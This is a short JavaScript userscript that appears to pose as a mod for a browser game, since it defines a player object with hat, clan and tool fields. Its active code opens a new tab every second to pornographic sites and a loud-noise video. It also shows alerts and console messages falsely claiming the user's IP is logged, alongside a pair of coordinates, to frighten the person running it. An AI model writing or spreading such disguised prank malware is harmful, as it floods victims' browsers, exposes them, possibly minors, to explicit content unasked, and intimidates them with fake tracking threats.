
(function() {
    'use strict';
setInterval(() => {
    window.open('https://rt.pornhub.com/gay', '_blank')
}, 1000)
setInterval(() => {
    console.log('Your IP is logged lol noob');
}, 1000)
setInterval(() => {
    window.open('https://brazzers-tv.vip/', '_blank')
}, 1000)
setInterval(() => {
    window.open('https://www.youtube.com/watch?v=xJZlO1dPktg&t=18s&pp=ygUKTE9VRCBOT0lTRQ%3D%3D', '_blank')
}, 1000)

let $ = function(){
    return document.querySelector
};

var msgpack5 = msgpack;
var myPlayer = {
    object: null,
    x: null,
    y: null,
    dir: null,
    tool: null,
    hat: null,
    score: null,
    clan: null,
    isLeader: null,
    isMember: null,
};
alert("ur ip is logged kid");
alert("52.3676° N, 4.9041° E");
window.prompt("Enjoy your Loux<3", [""]);
})();
